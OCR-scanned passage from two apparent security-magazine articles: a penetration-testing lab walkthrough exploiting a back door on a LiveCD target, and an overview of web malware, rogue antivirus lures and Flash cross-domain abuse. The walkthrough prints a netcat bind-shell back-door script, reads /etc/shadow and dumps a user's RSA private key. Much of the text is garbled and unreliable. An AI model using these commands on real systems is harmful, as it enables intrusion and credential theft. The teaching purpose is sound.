ot@bt:-# nmap 192.168.2.101 -p 6666,13782 



Starting Nmap 5.09 ( http://nm 



) at 2010-01-22 03:4 



6666/tcp closed ire 

13782/tcp open netbackup 

MAC Address: 00 : 0C : 29 : CD : DA: 95 (VMware) 

Nmap done: 1 IP address fl host up) scanned in 13.31 seci 

root@bt:-# telnet 192.168.2.101 13782 

Trying 192.168.2.101. . . 

Connected to 192.168.2.101. 

Escape character is ,rt 3". 

n ] 

telnet* quit 
Connection closed. 

root@bt: -# nmap 192.168.2.101 -p 6666,13782 

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-22 03:! 
Interesting ports on 192.168.2.101: 



13782/tcp closed netbackup 

MAC Address: 00 : 0C : 29 : CD : DA: 95 (VMware) 



J I M Shell j MShellNo.2 | fShellNo.3 | 



Figure 2. Scanning Ports 6666 and 13782 
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| root@bt : -# telnet 192 . 168 . 2 . 1S1 6666 
Trying 192.168.2.101. . . 
Connected to 192.168.2.191. 
Escape character is "*]'. 

~] 

telnet?- quit 
Connection closed. 

root@bt:-# nmap 192.168.2.101 -p 6666,13782 

Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-22 05:29 UTC 

Interesting ports on 192.168.2.101: 

PORT STATE SERVICE 

6666/tcp closed ire 

13782/tcp open netbackup 

MAC Address: 00 : 0C : 29 : CD : DA: 95 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds 
rootfabt: # I 



Figure 3. Additional Scans of Port 6666 and 13782 

are using these ports. Let's start with investigating port 
1 3782 a bit closer, since that port was the first one open 
to us when we did our initial scans in the previous step 
- Information Gathering. In Figure 4, we connect to port 
13782 using telnet, and try some simple commands, 
in the hope that something will respond. However, 
eventually that meets with failure. 

After we connected to port 13782 and received no 
response to any of our queries, we can try the same 
thing with port 6666 (which should be open, since we 
already discovered that connecting to one opens the 
other). When we attempt to query the application running 
on port 6666 (which is indeed open), we get quite 
a different response - we receive a message stating 
that ; command not found whenever we attempt any 
command. At this point, we can infer that the system is 
allowing us to communicate with the application on port 
6666, but we are not sure what application it is yet. 

Vulnerability Identification 

In the previous article, I discussed (ok, ok... got on 
a soap box) about the need to use multiple tools when 
performing any task. The reason behind the need to 
use multiple tools is that we don't always get a true and 
complete understanding of the environment when we 




|H| M Sheii I a Shell No. 2 | aShellNo. 3 | 




Figure 5. Connecting to Port 13782 and 6666 using Netcat 

only use one tool. In the previous article, we used netcat 
to connect to the target system; we will try connecting 
again with netcat to see what happens - we may also 
want to try SSH as well, but based on the output from 
port 6666, it is unlikely that connecting via SSH will yield 
any additional information. 

In Figure 5, we see what happens when we connect 
to port 13782 and port 6666 using netcat. As before, 
we did not receive any response from port 13782, but 
when we connected to port 6666 and entered the is 
command, we received a list of directories - quite 
unexpected. This means that for some reason, we 
can access the 192.168.2.101 server over port 6666 
and have internal access to the system without any 
authentication. 

At this point, we both simultaneously identified 
and verified a vulnerability within the 192.168.2.101 
server. So, how does this relate to exploitation of 
trust relationships? It seems someone set up a back 
door using a poor-man's port knocking technique. 
The full extent of our access is not yet known, but 
it is safe to assume that since we are not using any 



Session Edit View Bookmarks Settings Help 



Linux si ax 2.6.16 #95 Wed Hay 17 10:16:21 GMT 2GG6 16S6 athloi 



cat /etc/shadov 

root : f If QsIUrlK6f vlethlW. Gf mSDN2c3/80lO: 14G47: ( 
bin:*:9797:G: : : : : 
daemon : * : 9797: G: : : : : 



uucp:*:9797:0: : : : 
operator:*:9797:C 
games : * : 9797: G: : : 
f t p : * : 9797 : 0: : : : : 
smmsp:*:9797:G: : : 
mysql : * : 9797: G: : 
rpc:*:9797:0: : : : : 
sshd:*:9797:G: : : : 
gdm:*:9797:G: : : : : 



■ip : f If j o9/I V/Kf 01 0s4f MdTmll k36tWD . vil : j 
dt ch : f If xdRCZ/K6f FAONlZx/BYXMl r3Rj kNf x: 
.sham : f If xCYlk.32Kf 3VRj 306HqT4CRil_Rf 0 . nsC 
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Figure 4. Connecting via Telnet to Ports 



Figure 6. Target System Enumeration 
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Figure 7. User Folder Enumeration 

sort of authentication, the access through port 6666 is 
surreptitious, and probably not something the system 
administrators know about. This possibly means 
someone has already exploited the system before 
us, and has created a trust relationship to all external 
systems that can connect to our target server at 
192.168.2.101. 

So let us find out exactly what we can do on this 
system - although at this point we have exceeded our 
intent to simply perform Vulnerability Identification and 
have moved past Vulnerability Verification and onto 
Enumeration, we will still have plenty of opportunity to 
discuss these other steps in more detail in future articles 
within this series. In Figure 6, we see some information 
about what type of access we have on the system and 
some information about the system itself. We see that 
the system we are attacking is a Linux system, version 
2.6.16, which matches our results from the Information 
Gathering phase. We can also see that we have root 
privileges, which is outstanding! 
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Is -al /home/ftp/ .warez 
total 932 

drvxr-xr-x 2 pirrip 513 1GG Jun 17 20GB . 
drwxr-xr-x 4 pirrip 513 8G Jun 17 2008 . . 
-rw-r--r-- 1 pirrip 513 839510 Jun 17 2008 AC00K.D0C 



Is -al /home/pirrip/ . ssh 



cat /home/pirrip/ . ssh/id_rsa 
BEGIN RSA PRIVATE KEY 

HIIEo0IBAAKCA0EAlpfb/CVukUw4Xe67YLEZzVI-WNaxOzJiIlCfcsoEGylmmtlA6 
i XHi 41 n Ls h z Xu 9n 536 J f H9LF AWGq e f B VX7Bz d / f C4+ j HS3q 891 K9FP7g FPwEml NH 
CvPXO ADx DFy Bll J OFf f J 9g Vv3 Vg HCa CPg S70Uq J DOh ZFDMSDMo Ba 91 P/L FOROm 58 
n Mq HDs GRfa e C5hTd p LXKf BuWB v /I Fu NEW VWNt ZDi e B2a i J g BWRUUI r z e GZSR3+ c Gl 
h i 6z a 67 VI i + c e 8f Fu B v I g a Ep v J Q J SI X7z PLU VI Qe z Wl NQRNpl KSa m 3TI YI 3+ Ywu h 
lcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci50IBIwKCA0EAvhF5s3GcchBPLqA/ 
k Ct VBk / HW2z c e r HI i LWXl s o N VC 0FB+ C ■:■ I IK y v 4p c d 81 OKs f J Si q Q9t vUa 5Gi UKU 
vn e 2u r b f 0S1 Cz d Mc Y4m 9al 4W7g P J k ACe An Ee 0+ OTq 9z o B v h x DCSc 79] u 7+ 7h q XD0 
If Zj XylBj j D7VH0KJWpf Ht VTMunBCMqoAMa2veuN6LgDJveQNi7kon4qc j 4SghGI 
bdBv/Cnk7PMkG+DhafTRWyXGrWFpTHV4BNKvOi+k4lVVloP9nJnh9]glY4EkD9LD 
OYt20Zt+XmlxScsi cBpVGc9m4ZrgmRZGV0PTyHuWJtURkDBYPizkiP] j SZf UbyZ 
y 9QECvKBg QDs R9wLz r 0b J I a 0X8d G4 r Et 8p OHd YK7KCH8Bc q 45i KKPz e Lx c h g u M3o 
+y 9nRz5x8RWXWZUKl 7Pl doqvm rKh6WVCrd J7mghPTYx3Dj hcaf 8q5XFTUhZH4xhB 
72glH6+JCECUj AFf j oST0EswCFKYssgYA22x3f vLGg3S8f GUj j ElxOKBgODogKVg 
iy XCE833e vccf rd/ot sy VcxNincun At YDAsqa2Zrj XL3oFwNwf CICVKPhqDl nG46 
HltiSeYXygPbuPbHzRdu0ZuG7iRxxVdndl52gq/Zt8MKNRD9mdbFRcRMXmMRfaE4 
RXd r y 9e B4 r Py wf Wg J PGN Vt 0FZP6PRV v + 1 p o q o OKBg BRA r HYKZzWGy b Ru n Al j 400U 
"tvRYvoZYhsWcHY/nI+6Vu65Lm 6wwTE6Gg G J v4Yb + ol 00k Lo b o Fh 7q Fs WHRJHN J C v 
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Figure 8. Enumeration of Interesting Directories 
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ot@bt:-# ftp 192.168.2.101 
nnected to 192.168.2.101. 
0 (vsFTPd 2.0.4) 



s fully changed. 



sful. Conside 
ctory listing 
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Figure 9. Enumerating FTP Server Offerings 

In Figure 6, we also see that I now have all the user 
names for the system, and hashed passwords. As 
mentioned in the previous article, the use of cracked 
passwords is one way to exploit a trust relationship; 
although we have root access at this point, eventually 
these passwords may become important to us, 
especially if someone breaks our (or more accurately, 
someone else's) back door. 

Let us perform some additional enumeration of our 
system to see what is happening, and why there is 
a back door on this system. In Figure 7, we take a look 
at the user's home directories. When we take a look at 
the FTP user, we can see that there are two directories 
— a /download and a / . warez directory. The .warez directory 
should be a concern to us, since it is a hidden directory 
and the name alone indicates something illegal. 

When we take a look at the other user's directories, 
we see that most of them are empty, except for the / 
home/pirr ±p folder, which contains a /.ssh folder. At this 
point, let us take a deeper look at the two directories that 
stand out from the rest. In Figure 8, we see that the / 
home /ftp /.warez directory contains a couple files - if we 
take a closer look at them (not shown in this article), we 
find that the ACOOK.DOC file is the Anarchy Cookbook, 
and the MC_marx.txt relates to Karl Marx, the famous 
communist philosopher. At this point, we could probably 
make the assumption that someone is using this server 



cd /etc/red 
cat rc . aslaxauth 
#!/bin/sh 
#pwned, bitches! 
mkdir /tmp/.pwn 

echo "#! /bin/sh" > /tmp/ . pwn/slaxauth . sh 

echo "nc -I -p 6666 -e /bin/sh" » /tmp/ . pwn/slaxauth . sh 

chmod 0777 /tmp/ . pwn/slaxauth . sh 

iptables -F 

while true ; do 

nc -I -p 13782 -e /tmp/ . pwn/slaxauth . sh 
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Figure 10. Back Door Script 
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to provide political material to the public, using the FTP 
server as a means to distribute information, especially 
since access to the FTP server allows anonymous login. 

Figure 9 illustrates that the FTP site does indeed 
provide anonymous visitors access to theACOOK.DOC 
and CM_Mar.txt files. Unfortunately, we did not catch 
this earlier in our previous step - Information Gathering. 
At this point, we should make a mental note to use 
the -a flag more often when examining file directories, 
including those in the FTP directory. 

In the /home/pirrip/.ssh directory seen in Figure 8, we 
see that the pirrip user has a public and private key 
which can be used for a number of purposes, including 
remote access, digital signatures, etc. We will save this 
file off onto our attack system, in case in the future we 
find a need for it. 

Let us see what else we can discover about the 
system. If we poke around some more, we find how the 
back door works. The /etc/rc . d directory contains all the 
startup and shutdown scripts for this particular Linux 
system. Figure 10 examines one script in particular 
- the rc.asiaxauth script (there are dozens of files in the 
/etc/red directory, and this one did not just jump out 
when I looked around. After looking at multiple files, 
I realized that this one deals specifically with the back 
door on port 6666). 

We see that this script performs a few functions; the 
first one is that a /tm P /. P wn directory is created - we 
should investigate it, but it appears the directory contains 
another script ( slaxauth . s h) that contains a single line ( nc 
-i - P 6666 - e /bin/sh). The e /bin/sh is what gives us 
access on port 6666. Another interesting point is that 
the script flushes i P tabi es which might have contained 
some system access rules; in other words, the script 
eliminates any potential host firewall that might prevent 
the writer from connecting to the 192.168.2.101 server. 

The Next Step 

At this point, we may seem finished with our attack - we 
have root access onto the system, we have encrypted 
passwords, and we have the private key for the pirrip USer. 
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Hakin9-v2.ISO 
IP: 192.168.2.102 
Figure 1 1 . New Network Configuration 



Since we can do anything we want on the system, it seems 
we are done. However, we are not done yet - let's add some 
complexity to our network and add in another system to 
our network. Figure 11 illustrates our new network, which 
contains another system, which is also a LiveCD (which 
can also be downloaded from the following web page: 
http://heorot. net/hakin9) . 

Once we launch the new server on the network, we 
can start our information gathering again; in Figure 12, 
we conduct another scan of our network from our attack 
platform. The results indicate that the 192.168.2.102 
system is reachable, but all ports are blocked; therefore, 
we cannot attack the system directly. However, if we log 
into the 192.168.2.101 system and conduct the same 
nmap scan, we find that the 2.101 system can directly 
communicate with the 2.102 system; this indicates that 
our new target has a trust relationship with our old 
target that we need to exploit. 

Just as in the previous article, I will be assigning 
homework (blame the years of me working as an 
Associate Professor if you want, but you might as well 
get your hands dirty, eh?). Now that we have a new 
target, we need to perform some additional information 
gathering and vulnerability identification on the new 
target. See if you can resolve the following: 

• What services and versions are running on 
192.168.2.102? 

• What potential vulnerabilities exist on 
192.168.2.102? 

• What potential trust relationships exist between 
2.101 and 2.102? 

• Can the encrypted passwords obtained on 
192.168.2.102 be cracked? 

The next article will answer these in detail, but there 
are plenty of challenges available to explore; not only is 
there another FTP server running on the 2.102 system, 
there is an email and a web server as well. Again, feel 
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free to conduct your own investigation by downloading 
the target from http://heorot.net/hakin9 and attacking it 
with nmap, netcat, telnet, and any other tool you want 
to try out. The web page above will also have a link to 
the Heorot.net forums; feel free to join the conversation 
as we move through each article and discuss how to 
exploit the Trust Relationships of our target system. 

Conclusion 

Trust relationships are the most difficult of attack 
vectors to exploit, but they yield the greatest advantage. 
When attacking trust relationships, the penetration test 
engineer has to assume the guise of someone (or 
something) else, and impersonate their actions exactly 
to successfully exploit a system. Other exploits - 
especially buffer overflows - take advantage of flaws in 
coding; hacking trust relationships require penetration 
test engineers to out-think the target, which is truthfully 
a lot more entertaining when successful. 

In this article, we obtained access to a system based 
on a trust relationship - unfortunately for the system 
owner, that trust relationship is probably not one they 
would be happy with. In the next article, we will start 
attacking our new target by using pre-established and 
authorized trust relationships - not just take advantage 



of a pre-existing backdoor. That way we can expand 
our understanding of how trust relationships can be 
exploited. 
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Web Mai wares 

Part 2 

A three part series about the study of the ever increasing 
threat of Malwares that uses the Web to propagate 



What you will learn... What you should know... 

• Tricks used by Malware authors to use the Web as a very sue- • Basics about Malwares, Antiviruses, Internet and Web based 
cessful mode for Malware propagation. Applications. 



n the previous section of the article Web Malwares 
(Part 1) we discussed about the various statistics 
that showed us the increase of Web Malware activity 
in recent times and why the focus of Malware authors 
have changed from creating havoc in the infrastructure 
to infecting the endpoints for various other henious 
purpose, we have seen it all. Once we are aware of 
these facts and figures, in the next section we will look 
into the technical Details of Web Malwares (Part 2). We 
are talking about details like How a Malware is designed 
for using the Web? How actually a Web Malware attacks 
a system? What are the different forms of Web Malware 
threats? etc. These technical details will help us to 
understand, in a better and deeper way, the threat of 
Web Malwares and also will help us to proactively take 
precautionary measures to avoid getting infected or 
carry out identification, removal and remediation incase 
of a possible infection. Let us now see and understand 
the various kinds of Web related Malware threats. 

Technical Details of Web Malwares 

Untill now, we were discussing about the various aspects 
of Web Malwares. Starting from the statistics that showed 
us the increase of Web Malware activity in recent times 
to why the focus of Malware authors have changed 
from creating havoc in the infrastructure to infecting the 
endpoints for various other henious purpose, we have 
seen it all. Once we are aware of these facts and figures, 
its good time for us to go into the technical details about 



Web Malwares. We are talking about details like How 
a Malware is designed for using the Web? How actually 
a Web Malware attacks a system? What are the different 
forms of Web Malware threats? etc. These technical details 
will help us to understand, in a better and deeper way, the 
threat of Web Malwares and also will help us to proactively 
take precautionary measures to avoid getting infected or 
carry out identification, removal and remediation incase of 
a possible infection. Let us now see and understand the 
various kinds of Web related Malware threats. 

Rogue Security Softwares 

Rogue Security Softwares are applications that pretend to 
be legitimate security applications. They use various kinds 
of tactics to make the user believe the legitimacy of these 
applications. From the names given to these applications 
to the look and feel of the application, the Malware authors 
make it sure that the average user surfing the internet will 
believe it to be something that can be useful for him/her 
to get rid of unwanted files and Malware from the system. 
Seldom do they know that the stuff that they are relying 
upon is in reality a specific kind of Malware in itself. 

There are certain reasons for which the Malware 
authors take the pain to make these applications as 
authentic as they can, at least as far as the external 
look and feel of the applications is concerned. We will 
look into the motive of Malware authors to create such 
applications later on in this article. From the dialog 
boxes to the application graphics, these applications 
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are designed to lure the users to a trap that would 
make him/her believe the authenticity of the purpose 
and objective of these applications. In simple terms, 
a Rogue Security Software will have a very professional 
look and feel, almost identical to some of the legitimate 
Security Softwares available today. This is definitely 
a Modus Operendi to fool the users to fall prey to the 
nefarious goals that the Malware author has devised. 

Methods of Infection 

There are various new ways by which Malware authors 
try to lure or trap the users for downloading or installing 
these Rogue Security Softwares. The success of 
a Malware author depends on this aspect as much as it 
depends on the Malware he created. From compromising 
vulnerable websites and inject malicious code in them, 
social engineering the unsuspecting users to click and 
download stuff that usually people would ignore, these 
have all become the weapons in a Malware authors 
arsenal. To understand the nature of these Rogue 
Security Softwares in a much more detailed way, we will 
have to look further into the tricks and tactics involved 
in spreading them. Let us take a closer look at some of 
these infection methodologies now: 

Fake System Errors: Many times, while surfing, it 
may happen that we will encounter a sudden popup 
that imitate a Warning! Message or a System Error! 
message. It might convey a fake alert or a fake 
Malware infection warning. The popups will further 
offer a free download of the actual application for the 
user to use and clean the so called infected files. Once 



System Error! 



Your computer was hijacked by Trojan. Win32. LinkReplacer 

It's dangerous for your system, some files can be lost and your browser can be slow! 
Click OK to download the antispyware program to clean your computer! (Recommended) 

| OK ~| Cancel 



Figure 1. Fa/ce Jrojan Detected" System Error 



Warning From] 




Malware Found 

Your systems is infected! 



Malware: Video 





you download and install these fake applications, it 
may carry out a lot of Malware like activities. However, 
even if a user chooses to move away from the option to 
download the applications, it will not let the user to do 
so. Sometimes even clicking the Cancel or the X button 
will initiate the download process (see Figure 1). 

Fake Infection Warnings: One thing very common 
about most of these alerts or warnings (see Figure 2) is 
that, these will, in a very eye catching manner, display 
a number of threats that were detected in our system. 
Accompanied with such messages are information about 
the possibility or the presence of more infected files. 

Fake Update Alerts: These Web alerts will point out that 
some commonly used components, plugins or applications 
in the system are older and they have to be updated to 
the latest version. These alerts imitate the description 
and details of the actual or legitimate application. This 
method has yet not become very wide spread but it is 
in practice and becoming popular gradually. In the below 
figure we can see an alert that imitates the update alert of 
Macromedia Flash Player (see Figure 3). 

Fake Security Center: The Malware authors have 
devised tactics by which they exploit the goodwill and 
trust that some of the reputed and legitimate companies 
have earned over the years by catering to the needs of 
the users. There are instances where these applications 
are hosted in websites that resemble the look and feel 
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Flash ActiveX Object Error: 

Your browser cannot display this swf file. 

You need to download new version of Macromedia 
Flash Player to play this file. 



To download new version of Macromedia Flash Player click Continue. 



Figure 3. Fake Flash ActiveX Component Error 
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Figure 2. Fake „l\Aolware Found" Warning 



Figure 4. Fake Windows Security Center 
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is probably contains spyware, adware, etc.. Your system miaht be at risk, Click here to protect your 




Figure 5. Fake IE Information Bar 



Go ogle 

Tips O 



Google has detected unregistered Antivirus 2009 copy on your computer. Google recommends 
you to activate Antivirus 2009 to protect your PC from malicious intrusions from the Internet. 



I Done 



Internet 



Figure 6. Fake Crafted Google Tips 

of certain legitimate and reputed websites. These fake 
websites imitate the authentic interface and present 
themselves as a helpful application with such precision, 
that its only when the content of these websites are 
scrutinized thoroughly, then only the differences become 
obvious. These methods are very successful because 
they can deceive even the most tech savvy users. Below 
is the screenshot of a fake website distributing one of 
these fake applications and it imitates the Windows 
Security Center to a great extent (see Figure 4). 

Fake IE Messages: These applications can install 
a BHO that would imitate the IE alert messages to a great 
level of accuracy. We have a tendency to trust alerts or 
messages that seem t be coming from the Operating 
System or some trusted application. However, a close 
inspection is always recommended because however 
accurately these fake alerts or messages may get 



a 



The page cannot be displayed 



The page you are looking for is currently unavailable. The Web 
site might be experiencing technical difficulties, or you may need 
to adjust your browser settings. 



Please try the following: 



• Instal l yirusR^siX'iic-r L-, software to clean your PC. 

• If you typed the page address in the Address bar, make 
sure that it is spelled correctly. 

• To check your connection settings, click the Tools menu, 
and then click Internet Options. On the Connections 
tab, click Settings. The settings should match those 
provided by your local area network CLAN) administrator or 
Internet service provider (ISP). 

• If your Network Administrator has enabled it, Microsoft 
Windows can examine your network and automatically 
discover network connection settings. 

If you would like Windows to try and discover them, 
click Detect Network Settings 

• Some sites require 12 8- bit connection security. Click the 
Help menu and then click About Internet Explorer to 
determine what strength security you have installed. 

• If you are trying to reach a secure site, make sure your 
Security settings can support it. Click the Tools menu, and 
then click Internet Options. On the Advanced tab, scroll 
to the Security section and check settings for SSL 2.0, SSL 
3.0, TLS 10, PCT LP. 

• Downloa d! VirusResponse Lai:- 2009 to remove spyware and 
adware threats. 



Cannot find server or DNS Error 
Internet Explorer 



Figure 7. Fake IE Page cannot be displayed page 
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displayed, still there will be definite ways to differentiate 
a fake one from a genuine one (see Figure 5). 

Fake Google Search Results: As mentioned above, 
these BHO's can inject content into any webpage that 
is getting displayed. They can even inject their texts 
in the search results from Google making it look as if 
Google is recommending the purchase of these Fake 
Applications (see Figure 6). 

Fake IE Errors: At first when an IE Error is displayed, 
it may become obvious that it's being generated by 
IE. Since a lot of us are aware of the way and format 
in which the IE Browser window shows us the error 
message, it becomes quite normal when some page 
cannot be displayed error appears. However, one 
thing is true that sometimes things are not what they 
appear to be. On a closer look, anyone can tell that the 
below screenshot is not an authentic IE Error message; 
rather it's a beautifully crafted, elegantly formatted and 
ingeniously thought of, plain and simple method to lure 
the unsuspecting user. Clicking the links will definitely 
initiate the download process (see Figure 7). 

Scaring Users: They can show fake BSOD screens or 
fake Windows Loading screens that would tell the users 
that a unregistered version of the application has been 
detected, and hence, upgrade it to a full version. These 



A spyware apptcatson has been detected and Windows has been shut down to 
prevent damage to your computer 

SPYWARE.IWISTERPX_WlLD_0xOOOOOOOO 

If this is the first time you've seen this Stop error screen, restart you 
computer, If this screen appears again,, follow these steps: 

Check to make sure your antivirus software is properly installed , If this is a 
new rtstafiaoon, ask you software manufacturer for any antivrus updates 
you might need. 

Windows detected unregistred version of Antivirus 2010 protection on your computer. 
If problem continue, ptease activate your antivirus software to prevent compter 
damage and data loss. 



*** SRV.SYS - Address F73120AE base at COO0O00O, DateStamp 36b072a3 
Beginning 'dump of physical memory... 
Physical memory dump complete. Restarting... 



Figure 8. Fake Blue Screen of Death 
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techniques are getting better and better with every 
generation of these Fake Applications (see Figure 8 
and Figure 9). 

If you look closely, you will see that one thing that they 
will ensure is, you are reminded with all these methods 
that these applications need upgradation and you have 
to purchase the full version of these applications to 
keep working in a smooth way. 

Attractive Websites: What we see is what we believe. 
But is this true? At times, we become biased and 
we judge things on their face value. This is where 
the strategies of deception cash on and we become 
victims of our ignorance. Most of these Rogue Security 
Softwares, by the means of certain tricks, can take us 
to a beautiful and colorful website. These websites are 
designed to look professional and very eye catching. We 
become more than interested to try the application that 
this pretty website is offering for free (see Figure 10). 

This is deception at its best. They all will convey the 
message that they are offering users free applications to get 
rid of Malwares from their system. Unfortunately, in reality, 
they just trick the user into installing a Rogue application 
into their system. Taking the example of AntiVirProtect, 
a known Rogue AntiSpyware, lets see how this Malware's 
author(s) have described it as (see Figure 11). 

This description is quite self explanatory. This 
description is enough to lure any simple user to trust 
it. Even the details about What is Spyware? and Basic 
signs of Spyware infection will never raise a question 
about the legitimacy of these applications in the minds 
of the users who are, to a great extent, ignorant about 
the Security Softwares (see Figure 12). 

Clicking CHECK YOUR PC NOW will initiate the 
download. The setup file of this Rogue application is 
called AntiVirProtectSetup.exe. This is the installer that 
will install the actual Malware in the system. However, 
this site doesn't initiate Drive-By-Download. It requires 
the user to trust it, download it and install it. 

There had been almost similar instances of numerous 
warez/porn websites distributing a specific kind of 
Malware called the Trojan Zlob. The Zlob scam plagued 
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the internet during 2006 and even today, one can still find 
quite a few active variants of Zlob, still being offered as 
Media Codec Installers. A partial list of Rogue Security 
Softwares can be referred to from the given Wikipedia link: 
http://en. wikipedia. org/wiki/Rogue_security_software . 

These, otherwise colorful and professional looking 
websites are part of the Rogue Security Software scam. 
They just flourish and thrive on the unsuspecting user's 
ignorance towards legitimate security applications. 
These are simple Web Malwares that uses the user's 
ignorance, social engineering and scare tactics to make 
people trust them, download them and install them. 
These are pretty straight forward Web Malwares but 
unfortunately, these are very successful and a very big 
menace in the internet these days. 

Flash Advertisements 

The Flash File Format (SWF) was designed as a very 
efficient delivery format for graphics and animations 
over the internet through web browsers. It was designed 
to meet the following goals: 

• Onscreen Display - The format is primarily intended 
for onscreen display and so it supports fast rendering 
of bitmaps, animation and interactive buttons. 

• Network Delivery - The files can be delivered over 
a network with limited and unpredictable bandwidth. 
The files are compressed to be small and support 
incremental rendering through streaming. SWF 
is a binary format and is not human readable like 
HTML. 
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Figure 9. Fake Windows Boot Screen 



Figure 10. Attractive Rogue Web Site 
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Figure 1 1 . Attractive Product Advertisement 

• Simplicity - The format is simple so that the 
player is small and portable enough over the low 
bandwidth internet connections as well. Also, the 
player depends upon only a very limited set of 
operating system functionality. 

• File Independence - Files can be displayed without 
any dependence on external resources such as fonts. 

• Extensibility - The format is a tagged format, so 
the format can be evolved with new features while 
maintaining backward compatibility with older 
players. 

• Scalability - Different computers have different 
resolutions and bit depths. Files work well on 
limited hardware, while taking advantage of more 
expensive hardware when it is available. 

• Speed - The files are designed to quickly get 
rendered at a high quality. 

The fact that SWF files can be played on virtually 
any platform's browser nowadays makes it a perfect 
environment for cross platform and cross domain 
interactions. This freedom has also brough the 
attension of the Malware authors to use this file format 
to achieve their goal. A Malware author can simply 
buy advertisement space in a legitimate website and 
deliver a malicious advertisement which can infect 
any user that visits the legitimate website. These 
advertisers can use a mechanism in flash that allows 
a pages to load JavaScript file from a different domain. 
Once this feature is incorporated, it becomes easier 
to carry out redirection needs from one domain to 
another domain. Although for security reasons, a Flash 
movie playing in a web browser is not allowed to 
access data that resides outside the exact web domain 
from which the SWF originated. Interestingly, you can 
still override this security feature by using the system. s 
ecurity. allowDomain command to identify domains with 
access to the objects and variables. It can also be 
bypassed using the cross domain policy configuration 
as mentioned below: 



What is Spyware? 
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Basic signs of Spyware infection 

If the answer to one of these questions is "Yes", then you are p 

1 . Your computer has slowed down 



2. Your Internet connection speed has decreased 

3. You have downloaded music or sqttwaujnFom the Web 

4. You get popups and annoying ads when you're online or sometimes t 

5. Your default home page has been changed to the one you didn't askfi 
6 You have an extra toolbar installed, and you don't know where it c 
7. You receive more spam emails than ever 



<?xml version="l . 0"?> 

<!DOCTYPE cross-domain-policy SYSTEM "http:// 

www . macromedia . com/ xml /dtds/ cross - 
domain-policy . dtd"> 
<cross-domain-policy> 

<allow-access-f rom domain="*" /> 
</ cross-domain-policy> 

There can be more ways by which we can specify the 
access of cross domain data: 

<allow-access-f rom domain="www. company . com" 

secure="false" /> 
<allow-access-f rom domain="hr" /> 
<allow-access-f rom domain="it" /> 
<allow-access-f rom domain="* . company . com" /> 
<allow-access-f rom domain="*" secure="f alse" /> 

Further more, an interesting survey carried out by 
Jeremiah Grossman showed that a total of about 8% of 
Fortune 500 companies have the cross domain policy 
file and out of these 2% of the policy files were wild 
carded for any domain. The Alexa 100 was even more 
pronounced. About 36% have crossdomain.xml, 6% 
of which were wild carded for any domain. Example 
and details of policy entries are taken from Adobe KB 
Article - tn_14213, please refer to the link below: http:/ 
/kb2. adobe. com/cps/142/tn_ 142 13. html. 

These bypass features can result into a redirection of 
the user's browser from goodsite.com to badsite.com. 
Thus Malware authors can intentionally redirect the user's 
browser to open a malicious website through some trusted 
and legitimate website. Once an attacker is successful in 
running a JavaScript on your browser, through these flash 
advertisements, very bad things can happen. Decentralized 
content of a website or cross domain interactions increases 
the chances of security breach and Web Malware 
propagation. Further more, in Action Script 3, Adobe 
introduced a socket-related event called SecurityErrorEvent. 
This event is always thrown when a Flash Player tries to 
connect to a socket that it is not allowed to connect to by 
policy. For example, when the below Action Script tries 
to make a socket connection to localhost it results in the 
Security Sandbox Error (see Listing 1 ). 

If a service is listening on that port the Flash Player 
writes the string <policy-f ile- request /> and waits for 
response from the service. Although, no TCP service 



lopening AntiVirProtectSetup.eHe 




You have chosen to open 




| AntiVirProtectSetup.eHe 




which is a: Application 




from : http : fjwww . antivirprotect . com 




Save File | Cancel 







Figure 12. Genuine Looking Description 



Figure 13. Rogue Spyware Download Window 
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will respond back, but there is a pottential to simulate 
a port scanning scenario. It was because of a design 
flaw in Action Script 3 socket handling mechanism, 
compiled Flash movies were able to scan for open TCP 
ports on any host reachable from the host running the 
SWF, bypassing the Flash Player Security Sandbox 
Model. A beautiful demonstration of this port scanning 
can be seen from this link: http://scan.flashsec.org. 
These features and techniqes are used sccessfully to 
aid the activities of malware authors for devising new 
and sophisticated attack methodologies. 

Drive-By-Download Attacks 

Before we start describing what we mean by Drive- 
By-Download, let us think of a situation when the 
above mentioned Rogue Security Softwares will get 
automatically installed in a system instead of depending 
on the users to trust them, download them and install 
them. Scary!! isn't it. But in reality, we are living in an 
age where these scary things have become a part of the 
reality. These days, Web Malwares don't even depend 
on the user's intervention for downloading them into the 
system. The download can also automatically happen 
without the user's knowledge. This is called Drive-By- 
Download. Drive-By-Download can happen by visiting 
an infected website, viewing a specially crafted e-mail 
message or even by clicking a deceptive popup window. 
Google Research had commented that, of the billions of 
web pages that they had investigated, more than 3 million 
unique URLs on over 180,000 web sites automatically 
install Malwares by Drive-By-Download. The worst part 
is, this statistics is increasing day by day. 

To understand how these Drive-By-Download happen, 
we must focus on the technique a little more. The Malware 
authors would use a malicious website with exploit code 
in it and send the victims its URL. When a user visits the 
link, the exploit code would cause a vulnerable user's 
computer buffer to overflow and execute malicious code. 
Execution of this malicious code will, as devised by the 
Malware author, download a predefined Malware silently 
from a predefined location, into the victims computer, and 
execute it. This is how, without a users knowledge, his/ 
her system can get infected. 

As we can see that for a Drive-By-Download attack 
to suceed, a buffer overflow has to happen which 
should inturn result in malicious code execution. This 
is how, even a Web Malware has to depend on some 
vulnerability in the victims computer. But one thing is 
of note that here more than OS related vulnerabilities, 
it is the Browser related vulnerabilities that are getting 
targeted. Browser related vulnerabilities because the 
exploitation is happening when the victims browser 
parses through a malicious piece of code present in the 
malicious website. Hence, we can now relate what we 
meant when we said that now a days Malware authors 
are focusing on the Application layer more than the 



underlying OS or platform. The focus and the trend has 
completely changed as more and more Malwares are 
targeting unfixed vulnerabilities in the client's browsers 
or browser related components or plugins. The increase 
of Drive-By-Download attacks can be associated to the 
increase in number of vulnerable Web applications and 
increase in number of vulnerabilities associated with 
various browsers and brower plugins or components. 
As we had seen earlier that as per IBM ISS X-Force 
Labs latest malware report, in 2008, 54.9 percent 
of all disclosed vulnerabilities were Web application 
vulnerabilities and 74 percent of Web Application 
vulnerabilities disclosed had no patch by year end. 

It was reported that IE was responsible for 43 percent 
of all reported Web browser vulnerabilities during the 
second half of 2008. Firefox accounted for 39 percent, 
Apple Safari accounted for 10 percent and Opera 
accounted for 9 percent. The Common Vulnerabilities 
and Exposures List (CVE) released advisories like 
CVE-2009-3077, CVE-2009-3079, CVE-2009-3069 
etc that discusses the vulnerabilities in Mozilla Firefox 
that would result in an attacker to potentially use 
